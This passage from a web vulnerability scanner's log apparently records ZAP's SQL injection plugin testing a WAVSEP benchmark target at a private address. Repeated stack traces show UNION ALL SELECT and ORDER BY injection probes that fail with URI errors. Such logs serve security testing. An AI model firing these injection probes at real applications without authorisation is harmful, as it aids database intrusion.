org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681561 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681562 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681563 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681564 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681565 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681565 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 2383#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 2383# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681566 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681567 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681568 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681569 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681570 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681570 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 